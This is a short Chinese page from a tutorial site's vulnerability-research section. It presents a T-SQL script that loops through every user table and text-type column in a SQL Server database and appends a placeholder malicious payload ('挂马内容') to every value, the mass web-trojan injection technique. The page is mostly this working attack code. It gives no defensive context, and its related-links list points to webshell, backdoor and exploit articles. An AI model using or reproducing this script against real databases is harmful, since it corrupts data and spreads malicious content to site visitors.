手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >最近比较流行的数据库挂马
最近比较流行的数据库挂马
摘要:SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype...

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

xtype=99ntext

xtype=35text

xtype=231nvarchar

xtype=167varchar

———————YD的分割——————————–

DECLARE@Tvarchar(255),

@Cvarchar(255)

DECLARETable_CursorCURSORFOR

Select

a.name,b.name

fromsysobjectsa,

syscolumnsb

wherea.id=b.idand

a.xtype='u'and

(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)

OPENTable_Cursor

FETCHNEXTFROMTable_CursorINTO@T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

exec('update['+@T+']set['+@C+']=

rtrim(convert(varchar,['+@C+']))+

”挂马内容”')

FETCHNEXTFROMTable_CursorINTO@T,@C

END

CLOSETable_Cursor

DEALLOCATETable_Cursor

———————YD的分割——————————–

【最近比较流行的数据库挂马】相关文章:

基于Webshell的sniffer可行性研究(图)

强悍的PHP脚本注入技巧(图)

利用FTP服务器的漏洞找肉鸡

ASP木马后门新思路

Internet Explorer6最新漏洞代码

最新迅雷本地溢出POC

COCOON Counter统计程序后台写马

从后台到webshell的一点思路

Dvbbs7.1.0 cookie存在泄露绝对路径漏洞

浅析国内某网络游戏的安全现况

精品推荐
分类导航